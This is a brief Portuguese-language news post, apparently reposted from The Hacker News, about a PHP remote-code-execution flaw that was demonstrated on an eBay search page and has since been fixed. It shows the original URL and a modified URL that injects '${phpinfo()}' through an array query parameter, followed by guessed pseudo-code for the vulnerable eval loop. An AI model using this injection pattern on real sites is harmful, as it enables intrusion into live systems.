Remote Code Execution EBay
Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.
Em um vídeo de demonstração, ele explorou a falha RCE no site eBay, e conseguiu exibir a saída da function nativa do php phpinfo(), apenas modificando a URL e injetar código.
[URL - ALVO ] https://sea.ebay.com/search/?q=david&catidd=1
Agora injetando o PHP.
[URL - MODIFICADA] https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1
Essa execução só é possível se a página de 'pesquisa' está recebendo "q" valor do parâmetro usando alguma função LOOP como "foreach ()". Muito provavelmente código no final do servidor deve ser algo como:
//php
foreach($_GET['q'] as $dados)
{
if $dados com sucesso é capaz de ignorar algumas funções de filtro de entrada
{
eval("executar algo aqui $dados");
}
}
//php
Vídeo:
OBS: A falha já foi corrigida.
Fonte:thehackernews.
